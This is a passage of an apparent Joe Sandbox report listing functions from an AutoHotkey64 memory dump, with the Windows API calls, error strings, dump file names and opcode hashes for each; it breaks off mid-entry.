Opcode Fuzzy Hash: e5842c8c87d392d3343c29d665c8d5d911e55b0ba21e752e6f8c008d9aba4a35
Instruction Fuzzy Hash: 4AA1A1B160464486FB668F27E4843E937A1F38DBE4F114226EB59A37F6DB38C880C745

Function 00000001400447B6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 196windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Strings

Target label does not exist., xrefs: 00000001400447DC

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Target label does not exist.
API String ID: 1623861271-2507343300
Opcode ID: 5fd11d57d38a1df0cfad498bbaf2a81494b1be09ad7081aca2533d20716dfb0d
Instruction ID: 8a0ea181c0cdde76f47c6e1ba070c38f3b15f981aa139c01673494ad3355c188
Opcode Fuzzy Hash: 5fd11d57d38a1df0cfad498bbaf2a81494b1be09ad7081aca2533d20716dfb0d
Instruction Fuzzy Hash: C7A1A3B1604A4486FB568B27E4843E937E1F38DBE4F12022AFB59676F6DB38C491C744

Function 0000000140044F3B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 194windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

Strings

wait, xrefs: 0000000140044F48

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: wait
API String ID: 130734711-2112783333
Opcode ID: c6991e72b72c96c440cb9a0ab71d3f4f2c231cb1769072a6e8ada75a7fa18175
Instruction ID: e26aee02ff944b136afd9371b1a23e5cadc8ee9482f7180c764f4f08b923d6cb
Opcode Fuzzy Hash: c6991e72b72c96c440cb9a0ab71d3f4f2c231cb1769072a6e8ada75a7fa18175
Instruction Fuzzy Hash: 14A1D6B160464486FB628B27E4443E937E1F74DBE4F120226FB59A3AF6DB38C485C705

Function 0000000140045AF6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Parameter #1 invalid., xrefs: 00000001400463A5

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: 411c775a3cee27c41a72e1195868406ef2f602358e2578de02c04dfc999aebf2
Instruction ID: b35a3b146edcc72b8a9b808be3874802647250798aa371186021cf01367e2050
Opcode Fuzzy Hash: 411c775a3cee27c41a72e1195868406ef2f602358e2578de02c04dfc999aebf2
Instruction Fuzzy Hash: DB91C4B160464486F7668B27E4843E937A1F78DBE4F110226FB5963AF6DB38C490C745

Function 000000014004632F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 189windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242

Strings

Parameter #1 invalid., xrefs: 00000001400463A5

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: ed043b90310eed74ac007a92e3cf1cb6314b29195448263a935734378b50bc86
Instruction ID: f8e2813c2b9cf1b62d8dbb7b73e7df292c07e64cee8880ac718404b74ba48636
Opcode Fuzzy Hash: ed043b90310eed74ac007a92e3cf1cb6314b29195448263a935734378b50bc86
Instruction Fuzzy Hash: 8EA1B3B160464486F7668F27E4843E937A1F38DBE4F11022AFB59A3AF6DB38C490C745

Function 0000000140046394 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Strings

Parameter #1 invalid., xrefs: 00000001400463A5

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: 3318d78d6267bd8fa4a591146dbbb362da6e9558756fb6de313248fae468cac2
Instruction ID: 91318c2450a41b03aa521e94dd5398c2d9e95177b8b9eb795db892dd479ba924
Opcode Fuzzy Hash: 3318d78d6267bd8fa4a591146dbbb362da6e9558756fb6de313248fae468cac2
Instruction Fuzzy Hash: CB91A3B160464486F7668B27E4843D937A1F38DBE4F11022AFB59A7BF6DB38C490CB45

Function 0000000140045A12 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400D6A8C: _errno.LIBCMT ref: 00000001400D6AA4
Part of subcall function 00000001400D6A8C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400D6AAF

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Strings

Play, xrefs: 0000000140045A12

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: Play
API String ID: 130734711-4273697156
Opcode ID: 1e501d3505acd41b836b9ad4590c9e31d6fe987f74a5d80c219928c8c7360f60
Instruction ID: 66ec0038dee778ed83d267e54b70ea6ffa993154cc6b85979dede8fb858e7a56
Opcode Fuzzy Hash: 1e501d3505acd41b836b9ad4590c9e31d6fe987f74a5d80c219928c8c7360f60
Instruction Fuzzy Hash: 2091B2B160464486F7668B27E4843E937A1F38DBE4F11022AFB59A3AF6DB38C490C705

Function 00000001400433A0 Relevance: 12.3, APIs: 8, Instructions: 264windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
CharLowerW.USER32 ref: 0000000140043472
CharUpperW.USER32 ref: 000000014004347A

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CharCountTick$ClipboardCloseGlobalLowerMessagePeekUnlockUpper
String ID:
API String ID: 1737845391-0
Opcode ID: 8298c6b8f40bf3d507f3fdf3717492e152b92cbbc63a324213a14ed80d7c6803
Instruction ID: 913cbdc755a4eed9dfa84c83336ae9f703f8e5b1b872e1b35a791116c2ed9a03
Opcode Fuzzy Hash: 8298c6b8f40bf3d507f3fdf3717492e152b92cbbc63a324213a14ed80d7c6803
Instruction Fuzzy Hash: 2CD1B1B260468485FB638F27E4443E937A1E78DBE4F120226FB59636F6DB38C885C744

Function 0000000140045794 Relevance: 12.2, APIs: 8, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322
IsWindow.USER32 ref: 00000001400457A0
DestroyWindow.USER32 ref: 00000001400457B1

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseDestroyGlobalMessagePeekUnlock
String ID:
API String ID: 2997888913-0
Opcode ID: cf3841789b8542876a624cbf7064db2453a6dc7f702c456fe3f74342894afa0a
Instruction ID: 1a41dad759a5e38842f790023473bf3fe19d710772231ea194eeb2b712bb080b
Opcode Fuzzy Hash: cf3841789b8542876a624cbf7064db2453a6dc7f702c456fe3f74342894afa0a
Instruction Fuzzy Hash: A791C4B1600A4486F7568B27E8443E937E1F74DBE4F11022AEB59A3BF6DB38C490C745

Function 0000000140096C00 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 0000000140096CD6

Strings

Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140096C74
Out of memory., xrefs: 0000000140096D0C

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: free
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1294909896-457448710
Opcode ID: 20a97dded2ee673152cd24021f324c9321f3d8d246c8a999c3df4884fabeaf0e
Instruction ID: 6ec7fe4d4aad8c2026fff439752cd938816e95c095e3758a3996ec73c726aa59
Opcode Fuzzy Hash: 20a97dded2ee673152cd24021f324c9321f3d8d246c8a999c3df4884fabeaf0e
Instruction Fuzzy Hash: B8E1ABB6605BC081EB629B22F8107EA77A5F788BD8F440126FB9917BB8DB38C455C700

Function 0000000140040DA7 Relevance: 10.8, APIs: 7, Instructions: 267clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
GetCPInfo.KERNEL32 ref: 0000000140040DF3

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: ClipboardCloseCountGlobalInfoTickUnlock
String ID:
API String ID: 3668674636-0
Opcode ID: c406c6195a5fb721d7f0d2b283c30af304fe54f3ce4bb9551cd097d4c0b8698f
Instruction ID: c424d5545e2850590be0638a1f74249e378e7ce6d5ffb12ad60fa2991127ebb3
Opcode Fuzzy Hash: c406c6195a5fb721d7f0d2b283c30af304fe54f3ce4bb9551cd097d4c0b8698f
Instruction Fuzzy Hash: B2E19072600B848AEB62CF26E8443D837A1F34DBA8F11422AEB5957BF5DB38C594C704

Function 0000000140041043 Relevance: 10.7, APIs: 7, Instructions: 237registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
RegCloseKey.ADVAPI32 ref: 00000001400410EA

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: bb88b4e355b392799bec45f805e714d2278f61b78fefad62898952488b2118c5
Instruction ID: 8a0f2414704886ba157b3f1690c45c79614c88c85db7e58b9ec83da4435c4f47
Opcode Fuzzy Hash: bb88b4e355b392799bec45f805e714d2278f61b78fefad62898952488b2118c5
Instruction Fuzzy Hash: FAC18172604B848AFB628B67E8843D937A1F38DBE4F110126EB5967BF5DB38C491C704

Function 0000000140046148 Relevance: 10.7, APIs: 7, Instructions: 225registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
RegCloseKey.ADVAPI32 ref: 0000000140046139

Part of subcall function 00000001400B59D0: RegCreateKeyExW.ADVAPI32 ref: 00000001400B5A4C
Part of subcall function 00000001400B59D0: RegCloseKey.ADVAPI32 ref: 00000001400B5D25
Part of subcall function 00000001400B59D0: GetLastError.KERNEL32 ref: 00000001400B5D34

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: Close$CountTick$ClipboardCreateErrorGlobalLastMessagePeekUnlock
String ID:
API String ID: 2674141723-0
Opcode ID: c9617a70fa148fbae9c8d0135c40f58955d462ee783b6bd844df18078dc859f5
Instruction ID: 199e9f249c141da11d0024d7ecb78ac6adb1becaa555f5a0b9de4e58f8dea485
Opcode Fuzzy Hash: c9617a70fa148fbae9c8d0135c40f58955d462ee783b6bd844df18078dc859f5
Instruction Fuzzy Hash: 20B19EB1604A8486F7668B27E8443D937A1F78DBE4F15022AEB5963BF6DB38C490C705

Function 00000001400460A6 Relevance: 10.7, APIs: 7, Instructions: 211registrywindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
RegCloseKey.ADVAPI32 ref: 0000000140046139

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
String ID:
API String ID: 4107439908-0
Opcode ID: 2ce09cb45d5792a291d280a9c266234c2b65c37c6109d7def44372bbf857b158
Instruction ID: 94d3782a6facd174323b77af5fcb85147c62923f7f906dac1f6ded5f8e3284d3
Opcode Fuzzy Hash: 2ce09cb45d5792a291d280a9c266234c2b65c37c6109d7def44372bbf857b158
Instruction Fuzzy Hash: 24B1B2B1604A8486FB668F27E4443E937A1F34DBE4F110226FB5963AF6DB38C494C745

Function 00000001400450E3 Relevance: 10.7, APIs: 7, Instructions: 206filewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
MoveFileW.KERNEL32 ref: 0000000140045106

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
